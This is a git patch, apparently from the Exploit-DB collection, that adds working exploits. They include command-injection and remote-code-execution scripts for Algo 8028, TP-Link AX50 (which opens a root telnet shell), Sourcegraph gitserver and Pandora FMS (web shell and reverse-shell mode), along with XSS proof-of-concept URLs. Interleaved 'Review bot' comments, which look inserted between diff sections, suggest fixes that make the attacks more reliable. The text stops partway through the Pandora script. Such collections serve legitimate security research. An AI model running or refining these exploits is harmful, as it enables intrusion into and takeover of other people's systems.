From 29e275db9480cbfd66e6f69690ba893f20754749 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Wed, 15 Jun 2022 05:01:57 +0000 Subject: [PATCH] DB: 2022-06-15 16 changes to exploits/shellcodes Real Player v.20.0.8.310 G2 Control - 'DoGoToURL()' Remote Code Execution (RCE) Real Player 16.0.3.51 - 'external::Import()' Directory Traversal to Remote Code Execution (RCE) HP LaserJet Professional M1210 MFP Series Receive Fax Service - Unquoted Service Path Marval MSM v14.19.0.12476 - Remote Code Execution (RCE) (Authenticated) Virtua Software Cobranca 12S - SQLi Marval MSM v14.19.0.12476 - Cross-Site Request Forgery (CSRF) Algo 8028 Control Panel - Remote Code Execution (RCE) (Authenticated) TP-Link Router AX50 firmware 210730 - Remote Code Execution (RCE) (Authenticated) Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE) Avantune Genialcloud ProJ 10 - Cross-Site Scripting (XSS) Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated) phpIPAM 1.4.5 - Remote Code Execution (RCE) (Authenticated) ChurchCRM 4.4.5 - SQLi Old Age Home Management System 1.0 - SQLi Authentication Bypass SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting (XSS) SolarView Compact 6.00 - 'pow' Cross-Site Scripting (XSS) --- exploits/hardware/remote/50960.py | 81 ++++++++ exploits/hardware/remote/50962.py | 295 ++++++++++++++++++++++++++++ exploits/hardware/webapps/50967.txt | 13 ++ exploits/hardware/webapps/50968.txt | 12 ++ exploits/multiple/remote/50964.py | 86 ++++++++ exploits/multiple/webapps/50955.txt | 46 +++++ exploits/php/webapps/50961.py | 293 +++++++++++++++++++++++++++ exploits/php/webapps/50963.py | 88 +++++++++ exploits/php/webapps/50965.txt | 27 +++ exploits/php/webapps/50966.txt | 38 ++++ exploits/windows/local/50953.txt | 38 ++++ exploits/windows/local/50954.txt | 29 +++ exploits/windows/local/50959.txt | 29 +++ exploits/windows/remote/50956.txt | 28 +++ exploits/windows/remote/50957.txt | 18 ++ exploits/windows/remote/50958.txt | 57 ++++++ files_exploits.csv | 16 ++ 17 files changed, 1194 insertions(+) create mode 
100755 exploits/hardware/remote/50960.py create mode 100755 exploits/hardware/remote/50962.py create mode 100644 exploits/hardware/webapps/50967.txt create mode 100644 exploits/hardware/webapps/50968.txt create mode 100755 exploits/multiple/remote/50964.py create mode 100644 exploits/multiple/webapps/50955.txt create mode 100755 exploits/php/webapps/50961.py create mode 100755 exploits/php/webapps/50963.py create mode 100644 exploits/php/webapps/50965.txt create mode 100644 exploits/php/webapps/50966.txt create mode 100644 exploits/windows/local/50953.txt create mode 100644 exploits/windows/local/50954.txt create mode 100644 exploits/windows/local/50959.txt create mode 100644 exploits/windows/remote/50956.txt create mode 100644 exploits/windows/remote/50957.txt create mode 100644 exploits/windows/remote/50958.txt diff --git a/exploits/hardware/remote/50960.py b/exploits/hardware/remote/50960.py new file mode 100755 index 000000000..ce5bd2469 --- /dev/null +++ b/exploits/hardware/remote/50960.py 
@@ -0,0 +1,81 @@ +# Exploit Title: Algo 8028 Control Panel - Remote Code Execution (RCE) (Authenticated) +# Google Dork: intitle:"Algo 8028 Control Panel" +# Shodan: title:"Algo 8028 Control Panel" +# Date: 2022-06-07 +# Exploit Author: Filip Carlsson +# Vendor Homepage: https://www.algosolutions.com/ +# Software Link: https://www.algosolutions.com/firmware-downloads/8028-firmware-selection/ +# Version: 3.3.3 +# Tested on: Version 3.3.3 +# CVE : N/A +# Exploit: + +# Due to bad sanitation in http:///control/fm-data.lua you can do command injection as root +# Request: POST +# Formdata: +# action: rename +# source: /a";echo $(id) 2>&1 > /opt/algo/web/root/cmd.txt;" +# target: / + +#!/usr/bin/env python3 +import sys +import requests + +cookie=None + +def main(): + # check if provided 3 args + if len(sys.argv) != 4: + print_help() + return + else: + host = sys.argv[1] + password = sys.argv[2] + command = sys.argv[3] + + if login(host, password): + # if login was successful, send command + send_command(host, command) + +def print_help(): + print("Usage: algo.py 192.168.1.123 password command") + print("Example: algo.py 192.168.123 algo \"cat /etc/passwd\"") + +def login(host, password): + url = f"http://{host}/index.lua" + data = {"pwd": password} + res = requests.post(url, data=data) + + # check if html contains "Invalid Password" + if "Invalid Password" in res.text: + print("Invalid password") + return False + else: + # save cookie + global cookie + cookie = res.cookies + print("Successfully logged in\n") + return True + +def send_command(host, command): + url = f"http://{host}/control/fm-data.lua" + data = {"action": "rename", "source": f"/a\";echo $({command}) 2>&1 > /opt/algo/web/root/a.txt;\"", "target": "/"} + res = requests.post(url, data=data, cookies=cookie) + + # get http://host/cmd.txt + url = f"http://{host}/a.txt" + res = requests.get(url) + + # if "404 Not Found" in text then command was not executed + if "404 Not Found" in res.text: + print("Command was 
not executed (404)") + else: + print(res.text) + + # delete cmd.txt + url = f"http://{host}/control/fm-data.lua" + data = {"action": "rename", "source": f"/a\";$(rm -rf /opt/algo/web/root/a.txt);\"", "target": "/"} + requests.post(url, data=data, cookies=cookie) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/hardware/remote/50962.py b/exploits/hardware/remote/50962.py new file mode 100755 index 000000000..1323d5b2b --- /dev/null +++ b/exploits/hardware/remote/50962.py 
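Review bot: In `send_command` the redirection `2>&1 > /opt/algo/web/root/a.txt` is in the wrong order, so the injected command's stderr is sent to the parent process's stdout rather than the file and only stdout is captured; swap it to `> /opt/algo/web/root/a.txt 2>&1`. The user-supplied `command` is also spliced raw into a double-quoted shell string, so any `"` or `)` in it breaks out of the injection point — sending it as `echo {base64} | base64 -d | sh` sidesteps that. Note that the output lands in the device's web root and is fetched without the session cookie, i.e. it is readable by anyone on the network until the second POST removes it, and that cleanup never runs if the script dies between the two requests. The `#!/usr/bin/env python3` line sits after the header comment, so despite the 100755 mode the file will not run via its shebang.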
@@ -0,0 +1,295 @@ +# Exploit Title: TP-Link Router AX50 firmware 210730 - Remote Code Execution (RCE) (Authenticated) +# Exploit Author: Tomas Melicher +# Technical Details: https://github.com/aaronsvk/CVE-2022-30075 +# Date: 2022-06-08 +# Vendor Homepage: https://www.tp-link.com/ +# Tested On: Tp-Link Archer AX50 +# Vulnerability Description: Remote Code Execution via importing malicious config file +# CVE: CVE-2022-30075 + +#!/usr/bin/python3 + +import argparse # pip install argparse +import requests # pip install requests +import binascii, base64, os, re, json, sys, time, math, random, hashlib +import tarfile, zlib +from Crypto.Cipher import AES, PKCS1_v1_5, PKCS1_OAEP # pip install pycryptodome +from Crypto.PublicKey import RSA +from Crypto.Util.Padding import pad, unpad +from Crypto.Random import get_random_bytes +from urllib.parse import urlencode + +class WebClient(object): + + def __init__(self, target, password): + self.target = target + self.password = password.encode('utf-8') + self.password_hash = hashlib.md5(('admin%s'%password).encode('utf-8')).hexdigest().encode('utf-8') + self.aes_key = (str(time.time()) + str(random.random())).replace('.','')[0:AES.block_size].encode('utf-8') + self.aes_iv = (str(time.time()) + str(random.random())).replace('.','')[0:AES.block_size].encode('utf-8') + + self.stok = '' + self.session = requests.Session() + + data = self.basic_request('/login?form=auth', {'operation':'read'}) + if data['success'] != True: + print('[!] 
unsupported router') + return + self.sign_rsa_n = int(data['data']['key'][0], 16) + self.sign_rsa_e = int(data['data']['key'][1], 16) + self.seq = data['data']['seq'] + + data = self.basic_request('/login?form=keys', {'operation':'read'}) + self.password_rsa_n = int(data['data']['password'][0], 16) + self.password_rsa_e = int(data['data']['password'][1], 16) + + self.stok = self.login() + + + def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext): + cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv) + plaintext_padded = pad(plaintext, aes_block_size) + return cipher.encrypt(plaintext_padded) + + + def aes_decrypt(self, aes_key, aes_iv, aes_block_size, ciphertext): + cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv) + plaintext_padded = cipher.decrypt(ciphertext) + plaintext = unpad(plaintext_padded, aes_block_size) + return plaintext + + + def rsa_encrypt(self, n, e, plaintext): + public_key = RSA.construct((n, e)).publickey() + encryptor = PKCS1_v1_5.new(public_key) + block_size = int(public_key.n.bit_length()/8) - 11 + encrypted_text = '' + for i in range(0, len(plaintext), block_size): + encrypted_text += encryptor.encrypt(plaintext[i:i+block_size]).hex() + return encrypted_text + + + def download_request(self, url, post_data): + res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data=post_data, stream=True) + filepath = os.getcwd()+'/'+re.findall(r'(?<=filename=")[^"]+', res.headers['Content-Disposition'])[0] + if os.path.exists(filepath): + print('[!] 
can\'t download, file "%s" already exists' % filepath) + return + with open(filepath, 'wb') as f: + for chunk in res.iter_content(chunk_size=4096): + f.write(chunk) + return filepath + + + def basic_request(self, url, post_data, files_data={}): + res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data=post_data, files=files_data) + return json.loads(res.content) + + + def encrypted_request(self, url, post_data): + serialized_data = urlencode(post_data) + encrypted_data = self.aes_encrypt(self.aes_key, self.aes_iv, AES.block_size, serialized_data.encode('utf-8')) + encrypted_data = base64.b64encode(encrypted_data) + + signature = ('k=%s&i=%s&h=%s&s=%d'.encode('utf-8')) % (self.aes_key, self.aes_iv, self.password_hash, self.seq+len(encrypted_data)) + encrypted_signature = self.rsa_encrypt(self.sign_rsa_n, self.sign_rsa_e, signature) + + res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data={'sign':encrypted_signature, 'data':encrypted_data}) # order of params is important + if(res.status_code != 200): + print('[!] url "%s" returned unexpected status code'%(url)) + return + encrypted_data = json.loads(res.content) + encrypted_data = base64.b64decode(encrypted_data['data']) + data = self.aes_decrypt(self.aes_key, self.aes_iv, AES.block_size, encrypted_data) + return json.loads(data) + + + def login(self): + post_data = {'operation':'login', 'password':self.rsa_encrypt(self.password_rsa_n, self.password_rsa_e, self.password)} + data = self.encrypted_request('/login?form=login', post_data) + if data['success'] != True: + print('[!] 
login failed') + return + print('[+] logged in, received token (stok): %s'%(data['data']['stok'])) + return data['data']['stok'] + + + +class BackupParser(object): + + def __init__(self, filepath): + self.encrypted_path = os.path.abspath(filepath) + self.decrypted_path = os.path.splitext(filepath)[0] + + self.aes_key = bytes.fromhex('2EB38F7EC41D4B8E1422805BCD5F740BC3B95BE163E39D67579EB344427F7836') # strings ./squashfs-root/usr/lib/lua/luci/model/crypto.lua + self.iv = bytes.fromhex('360028C9064242F81074F4C127D299F6') # strings ./squashfs-root/usr/lib/lua/luci/model/crypto.lua + + + def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext): + cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv) + plaintext_padded = pad(plaintext, aes_block_size) + return cipher.encrypt(plaintext_padded) + + + def aes_decrypt(self, aes_key, aes_iv, aes_block_size, ciphertext): + cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv) + plaintext_padded = cipher.decrypt(ciphertext) + plaintext = unpad(plaintext_padded, aes_block_size) + return plaintext + + + def encrypt_config(self): + if not os.path.isdir(self.decrypted_path): + print('[!] 
invalid directory "%s"'%(self.decrypted_path)) + return + + # encrypt, compress each .xml using zlib and add them to tar archive + with tarfile.open('%s/data.tar'%(self.decrypted_path), 'w') as tar: + for filename in os.listdir(self.decrypted_path): + basename,ext = os.path.splitext(filename) + if ext == '.xml': + xml_path = '%s/%s'%(self.decrypted_path,filename) + bin_path = '%s/%s.bin'%(self.decrypted_path,basename) + with open(xml_path, 'rb') as f: + plaintext = f.read() + if len(plaintext) == 0: + f = open(bin_path, 'w') + f.close() + else: + compressed = zlib.compress(plaintext) + encrypted = self.aes_encrypt(self.aes_key, self.iv, AES.block_size, compressed) + with open(bin_path, 'wb') as f: + f.write(encrypted) + tar.add(bin_path, os.path.basename(bin_path)) + os.unlink(bin_path) + # compress tar archive using zlib and encrypt + with open('%s/md5_sum'%(self.decrypted_path), 'rb') as f1, open('%s/data.tar'%(self.decrypted_path), 'rb') as f2: + compressed = zlib.compress(f1.read()+f2.read()) + encrypted = self.aes_encrypt(self.aes_key, self.iv, AES.block_size, compressed) + # write into final config file + with open('%s'%(self.encrypted_path), 'wb') as f: + f.write(encrypted) + os.unlink('%s/data.tar'%(self.decrypted_path)) + + + def decrypt_config(self): + if not os.path.isfile(self.encrypted_path): + print('[!] 
invalid file "%s"'%(self.encrypted_path)) + return + + # decrypt and decompress config file + with open(self.encrypted_path, 'rb') as f: + decrypted = self.aes_decrypt(self.aes_key, self.iv, AES.block_size, f.read()) + decompressed = zlib.decompress(decrypted) + os.mkdir(self.decrypted_path) + # store decrypted data into files + with open('%s/md5_sum'%(self.decrypted_path), 'wb') as f: + f.write(decompressed[0:16]) + with open('%s/data.tar'%(self.decrypted_path), 'wb') as f: + f.write(decompressed[16:]) + # untar second part of decrypted data + with tarfile.open('%s/data.tar'%(self.decrypted_path), 'r') as tar: + tar.extractall(path=self.decrypted_path) + # decrypt and decompress each .bin file from tar archive + for filename in os.listdir(self.decrypted_path): + basename,ext = os.path.splitext(filename) + if ext == '.bin': + bin_path = '%s/%s'%(self.decrypted_path,filename) + xml_path = '%s/%s.xml'%(self.decrypted_path,basename) + with open(bin_path, 'rb') as f: + ciphertext = f.read() + os.unlink(bin_path) + if len(ciphertext) == 0: + f = open(xml_path, 'w') + f.close() + continue + decrypted = self.aes_decrypt(self.aes_key, self.iv, AES.block_size, ciphertext) + decompressed = zlib.decompress(decrypted) + with open(xml_path, 'wb') as f: + f.write(decompressed) + os.unlink('%s/data.tar'%(self.decrypted_path)) + + + def modify_config(self, command): + xml_path = '%s/ori-backup-user-config.xml'%(self.decrypted_path) + if not os.path.isfile(xml_path): + print('[!] 
invalid file "%s"'%(xml_path)) + return + + with open(xml_path, 'r') as f: + xml_content = f.read() + + # https://openwrt.org/docs/guide-user/services/ddns/client#detecting_wan_ip_with_script + payload = '\n' + payload += 'on\n' + payload += 'http://127.0.0.1/\n' + payload += 'x.example.org\n' + payload += 'X\n' + payload += 'X\n' + payload += 'script\n' + payload += '%s\n' % (command.replace('<','<').replace('&','&')) + payload += 'internet\n' # not worked for other interfaces + payload += '5\n' + payload += 'seconds\n' + payload += '3\n' + payload += '12\n' + payload += 'hours\n' + payload += '30\n' + payload += 'days\n' + payload += '\n' + + if '' in xml_content: + xml_content = re.sub(r'[\s\S]+?\n', '%s'%(payload), xml_content, 1) + else: + xml_content = xml_content.replace('\n', '\n%s'%(payload), 1) + with open(xml_path, 'w') as f: + f.write(xml_content) + + + +arg_parser = argparse.ArgumentParser() +arg_parser.add_argument('-t', metavar='target', help='ip address of tp-link router', required=True) +arg_parser.add_argument('-p', metavar='password', required=True) +arg_parser.add_argument('-b', action='store_true', help='only backup and decrypt config') +arg_parser.add_argument('-r', metavar='backup_directory', help='only encrypt and restore directory with decrypted config') +arg_parser.add_argument('-c', metavar='cmd', default='/usr/sbin/telnetd -l /bin/login.sh', help='command to execute') +args = arg_parser.parse_args() + +client = WebClient(args.t, args.p) +parser = None + +if not args.r: + print('[*] downloading config file ...') + filepath = client.download_request('/admin/firmware?form=config_multipart', {'operation':'backup'}) + if not filepath: + sys.exit(-1) + + print('[*] decrypting config file "%s" ...'%(filepath)) + parser = BackupParser(filepath) + parser.decrypt_config() + print('[+] successfully decrypted into directory "%s"'%(parser.decrypted_path)) + +if not args.b and not args.r: + filepath = '%s_modified'%(parser.decrypted_path) + 
os.rename(parser.decrypted_path, filepath) + parser.decrypted_path = os.path.abspath(filepath) + parser.encrypted_path = '%s.bin'%(filepath) + parser.modify_config(args.c) + print('[+] modified directory with decrypted config "%s" ...'%(parser.decrypted_path)) + +if not args.b: + if parser is None: + parser = BackupParser('%s.bin'%(args.r.rstrip('/'))) + print('[*] encrypting directory with modified config "%s" ...'%(parser.decrypted_path)) + parser.encrypt_config() + data = client.basic_request('/admin/firmware?form=config_multipart', {'operation':'read'}) + timeout = data['data']['totaltime'] if data['success'] else 180 + print('[*] uploading modified config file "%s"'%(parser.encrypted_path)) + data = client.basic_request('/admin/firmware?form=config_multipart', {'operation':'restore'}, {'archive':open(parser.encrypted_path,'rb')}) + if not data['success']: + print('[!] unexpected response') + print(data) + sys.exit(-1) + + print('[+] config file successfully uploaded') + print('[*] router will reboot in few seconds... when it becomes online again (few minutes), try "telnet %s" and enjoy root shell !!!'%(args.t)) \ No newline at end of file diff --git a/exploits/hardware/webapps/50967.txt b/exploits/hardware/webapps/50967.txt new file mode 100644 index 000000000..6c00bf960 --- /dev/null +++ b/exploits/hardware/webapps/50967.txt @@ -0,0 +1,13 @@ +# Exploit Title: SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting (XSS) +# Date: 2022-05-15 +# Exploit Author: Ahmed Alroky +# Author Company : AIactive +# Version: ver.6.00 +# Vendor home page : https://www.contec.com/ +# Authentication Required: No +# CVE : CVE-2022-29299 +# Tested on: Windows + +# Proof Of Concept: + +http://IP_ADDRESS/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(9)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6 \ No newline at end of file 
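Review bot: `download_request` builds the output path from the router's `Content-Disposition` filename with only a regex and joins it onto `os.getcwd()`, so a filename containing `/` or `..` would write outside the working directory; take `os.path.basename(...)` of the match before joining. Likewise `decrypt_config` calls `tar.extractall(path=self.decrypted_path)` on the archive unpacked from the backup with no member-name check, so an entry like `../x` escapes the directory — reject absolute paths and `..` components in each `tar.getmembers()` name, or use `extractall(filter='data')` on Python 3.12+. Both inputs come from the target device, which is exactly the party an exploit should not trust. Separately, the `modify_config` payload lines appear to have lost their XML element tags in this rendering (e.g. `payload += 'on\n'`, `command.replace('<','<')`), so the injected ddns section cannot be reviewed here; confirm against the upstream file.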
diff --git a/exploits/hardware/webapps/50968.txt b/exploits/hardware/webapps/50968.txt new file mode 100644 index 000000000..96f91718e --- /dev/null +++ b/exploits/hardware/webapps/50968.txt @@ -0,0 +1,12 @@ +# Exploit Title: SolarView Compact 6.00 - 'pow' Cross-Site Scripting (XSS) +# Date: 2022-05-15 +# Exploit Author: Ahmed Alroky +# Author Company : AIactive +# Version: ver.6.00 +# Vendor home page : https://www.contec.com/ +# Authentication Required: No +# CVE : CVE-2022-29301 +# Tested on: Windows + +# Proof Of Concept: +http://IP_ADDRESS/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(9)%3C/script%3E%3C%22&bgcolor=green \ No newline at end of file diff --git a/exploits/multiple/remote/50964.py b/exploits/multiple/remote/50964.py new file mode 100755 index 000000000..910a11ef2 --- /dev/null +++ b/exploits/multiple/remote/50964.py 
@@ -0,0 +1,86 @@ +# Exploit Title: Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE) +# Date: 2022-06-10 +# Exploit Author: Altelus +# Vendor Homepage: https://about.sourcegraph.com/ +# Version: 3.63.3 +# Tested on: Linux +# CVE : CVE-2022-23642 +# Docker Container: sourcegraph/server:3.36.3 + +# Sourcegraph prior to 3.37.0 has a remote code execution vulnerability on its gitserver service. +# This is due to lack of restriction on git config execution thus "core.sshCommand" can be passed +# on the HTTP arguments which can contain arbitrary bash commands. Note that this is only possible +# if gitserver is exposed to the attacker. This is tested on Sourcegraph 3.36.3 +# +# Exploitation parameters: +# - Exposed Sourcegraph gitserver +# - Existing repo on sourcegraph + + + +import json +import argparse +import requests + +def exploit(host, existing_git, cmd): + + # setting sshCommand + data = { + "Repo" : existing_git, + "Args" : [ + "config", + "core.sshCommand", + cmd + ] + } + + res = requests.get(host+"/exec", json=data).text + + if len(res) > 0: + print("[-] Didn't work: {}".format(res)) + exit(0) + + # setting fake origin + data = { + "Repo" : existing_git, + "Args" : [ + "remote", + "add", + "origin", + "git@lolololz:foo/bar.git" + ] + } + + res = requests.get(host+"/exec", json=data).text + + if len(res) > 0: + print("[-] Didn't work: {}".format(res)) + exit(0) + + # triggering command using push + data = { + "Repo" : existing_git, + "Args" : [ + "push", + "origin", + "master" + ] + } + + res = requests.get(host+"/exec", json=data).text + + print("[*] Finished executing exploit") + +parser = argparse.ArgumentParser() + +parser.add_argument('--gitserver-host', required=True, help="Target Sourcegraph Gitserver Host") +parser.add_argument('--existing-git', required=True, help="e.g. 
Link of existing repository in target Sourcegraph") +parser.add_argument('--cmd', required=True, help="Command to run") +args = parser.parse_args() + +host = args.gitserver_host +existing_git = args.existing_git +cmd = args.cmd + + +exploit(host, existing_git, cmd) \ No newline at end of file diff --git a/exploits/multiple/webapps/50955.txt b/exploits/multiple/webapps/50955.txt new file mode 100644 index 000000000..6b67985f0 --- /dev/null +++ b/exploits/multiple/webapps/50955.txt 
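Review bot: The second step runs `git remote add origin ...`, which git rejects when a remote named `origin` already exists, and the first step persistently sets `core.sshCommand` in the target repo's config with nothing reverting either change, so a re-run or the repo's next legitimate fetch is affected. Use a throwaway remote name and revert afterwards with `["config", "--unset", "core.sshCommand"]` and `["remote", "remove", name]`. On the failure branches `exit(0)` reports success to the caller; use `exit(1)`. The header says `Version: 3.63.3` while the title and the Docker tag say 3.36.3 — fix the header.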
@@ -0,0 +1,46 @@ +# Exploit Title: Avantune Genialcloud ProJ 10 - Cross-Site Scripting (XSS) +# Date: 2022-06-01 +# Exploit Author: Andrea Intilangelo +# Vendor Homepage: https://www.avantune.com +# Software Link: https://www.genialcloud.com - https://www.genialcloud.com/discover-genialcloud-proj - https://store.genialcloud.com +# Version: 10 +# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 100.0, Microsoft Edge 101.0.1210.39) +# CVE: CVE-2022-29296 + + +Reflected Cross-Site Scripting (XSS) vulnerability in login-portal webpage of Genialcloud ProJ (and potentially in other platforms from the +same software house "Avantune" since codebase seems shared with their other products: Facsys and Analysis) allows remote attacker to inject +and execute arbitrary web scripts or HTML via a crafted payload. + +Request parameters affected is "msg". + +PoC Request: +GET /eportal/?nologon=1&msg=Invalid%20username%20or%20password%27%3Balert%28%22y0%21+XSS+here+%3A%29%22%29%2F%2F HTTP/1.1 +Host: [REDACTED] +Cookie: ASP.NET_SessionId=3recnmmlpo1glzzyejdoezk2 +Upgrade-Insecure-Requests: 1 +Accept-Encoding: gzip, deflate +Accept: */* +Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36 +Connection: close +Cache-Control: max-age=0 + +PoC Response: +HTTP/1.1 200 OK +Cache-Control: private +Content-Type: text/html; charset=utf-8 +Server: Microsoft-IIS/10.0 +X-AspNet-Version: 4.0.30319 +X-Powered-By: ASP.NET +Date: Wed, 11 May 2022 10:51:10 GMT +Connection: close +Content-Length: 8162 + + + + + var Msg = 'Invalid username or password';alert("y0! XSS here :)")//'; +...[SNIP]... \ No newline at end of file diff --git a/exploits/php/webapps/50961.py b/exploits/php/webapps/50961.py new file mode 100755 index 000000000..5783a504e --- /dev/null +++ b/exploits/php/webapps/50961.py 
@@ -0,0 +1,293 @@ +# Exploit Title: Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated) +# Date: 05/20/2022 +# Exploit Author: UNICORD (NicPWNs & Dev-Yeoj) +# Vendor Homepage: https://pandorafms.com/ +# Software Link: https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/742_FIX_PERL2020/Tarball/pandorafms_server-7.0NG.742_FIX_PERL2020.tar.gz +# Version: v7.0NG.742 +# Tested on: Pandora FMS v7.0NG.742 (Ubuntu) +# CVE: CVE-2020-5844 +# Source: https://github.com/UNICORDev/exploit-CVE-2020-5844 +# Description: index.php?sec=godmode/extensions&sec2=extensions/files_repo in Pandora FMS v7.0 NG allows authenticated administrators to upload malicious PHP scripts, and execute them via base64 decoding of the file location. This affects v7.0NG.742_FIX_PERL2020. + +#!/usr/bin/env python3 + +# Imports +try: + import requests +except: + print(f"ERRORED: RUN: pip install requests") + exit() +import sys +import time +import urllib.parse + +# Class for colors +class color: + red = '\033[91m' + gold = '\033[93m' + blue = '\033[36m' + green = '\033[92m' + no = '\033[0m' + +# Print UNICORD ASCII Art +def UNICORD_ASCII(): + print(rf""" +{color.red} _ __,~~~{color.gold}/{color.red}_{color.no} {color.blue}__ ___ _______________ ___ ___{color.no} +{color.red} ,~~`( )_( )-\| {color.blue}/ / / / |/ / _/ ___/ __ \/ _ \/ _ \{color.no} +{color.red} |/| `--. 
{color.blue}/ /_/ / // // /__/ /_/ / , _/ // /{color.no} +{color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\____/_/|_/___/\___/\____/_/|_/____/{color.green}....{color.no} + """) + +# Print exploit help menu +def help(): + print(r"""UNICORD Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution + +Usage: + python3 exploit-CVE-2020-5844.py -t -u + python3 exploit-CVE-2020-5844.py -t -p + python3 exploit-CVE-2020-5844.py -t -p [-c ] + python3 exploit-CVE-2020-5844.py -t -p [-s ] + python3 exploit-CVE-2020-5844.py -t -p [-w ] + python3 exploit-CVE-2020-5844.py -h + +Options: + -t Target host and port. Provide target IP address and port. + -u Target username and password. Provide username and password to log in to Pandora FMS. + -p Target valid PHP session ID. No username or password needed. (Optional) + -s Reverse shell mode. Provide local IP address and port. (Optional) + -c Custom command mode. Provide command to execute. (Optional) + -w Web shell custom mode. Provide custom PHP file name. (Optional) + -h Show this help menu. 
+""") + exit() + +# Pretty loading wheel +def loading(spins): + + def spinning_cursor(): + while True: + for cursor in '|/-\\': + yield cursor + + spinner = spinning_cursor() + for _ in range(spins): + sys.stdout.write(next(spinner)) + sys.stdout.flush() + time.sleep(0.1) + sys.stdout.write('\b') + +# Run the exploit +def exploit(exploitMode, targetSess): + + UNICORD_ASCII() + + # Print initial variables + print(f"{color.blue}UNICORD: {color.red}Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution{color.no}") + print(f"{color.blue}OPTIONS: {color.gold}{modes[exploitMode]}{color.no}") + if targetSess is not None: + print(f"{color.blue}PHPSESS: {color.gold}{targetSess}{color.no}") + elif targetUser is not None: + print(f"{color.blue}USERNAME: {color.gold}{targetUser}{color.no}") + print(f"{color.blue}PASSWORD: {color.gold}{targetPass}{color.no}") + + if exploitMode == "command": + print(f"{color.blue}COMMAND: {color.gold}{command}{color.no}") + if exploitMode == "web": + print(f"{color.blue}WEBFILE: {color.gold}{webName}{color.no}") + if exploitMode == "shell": + print(f"{color.blue}LOCALIP: {color.gold}{localIP}:{localPort}{color.no}") + print(f"{color.blue}WARNING: {color.gold}Be sure to start a local listener on the above IP and port.{color.no}") + print(f"{color.blue}WEBSITE: {color.gold}http://{targetIP}:{targetPort}/pandora_console{color.no}") + + loading(15) + + # If a PHPSESSID is not provided, grab one with valid username and password + if targetSess is None: + try: + getSession = requests.post(f"http://{targetIP}:{targetPort}/pandora_console/index.php?login=1", data={"nick": targetUser, "pass": targetPass, "login_button": "login"}) + targetSess = getSession.cookies.get('PHPSESSID') + print(f"{color.blue}PHPSESS: {color.gold}{targetSess}{color.no}") + if "login_move" in getSession.text: + print(f"{color.blue}ERRORED: {color.red}Invalid credentials!{color.no}") + except: + print(f"{color.blue}ERRORED: {color.red}Could not log in to 
website!{color.no}") + exit() + + # Set headers, parameters, and cookies for post request + headers = { + 'Host': f'{targetIP}', + 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'multipart/form-data; boundary=---------------------------308045185511758964171231871874', + 'Content-Length': '1289', + 'Connection': 'close', + 'Referer': f'http://{targetIP}:{targetPort}/pandora_console/index.php?sec=gsetup&sec2=godmode/setup/file_manager', + 'Upgrade-Insecure-Requests': '1', + 'Sec-Fetch-Dest': 'document', + 'Sec-Fetch-Mode': 'navigate', + 'Sec-Fetch-Site': 'same-origin', + 'Sec-Fetch-User': '?1' + } + params = ( + ('sec', 'gsetup'), + ('sec2', 'godmode/setup/file_manager') + ) + cookies = {'PHPSESSID': targetSess} + # Basic PHP web shell with 'cmd' parameter + data = f'-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="file"; filename="{webName}"\r\nContent-Type: application/x-php\r\n\r\n\n\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="umask"\r\n\r\n\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="decompress_sent"\r\n\r\n1\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="go"\r\n\r\nGo\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="real_directory"\r\n\r\n/var/www/pandora/pandora_console/images\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="directory"\r\n\r\nimages\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; 
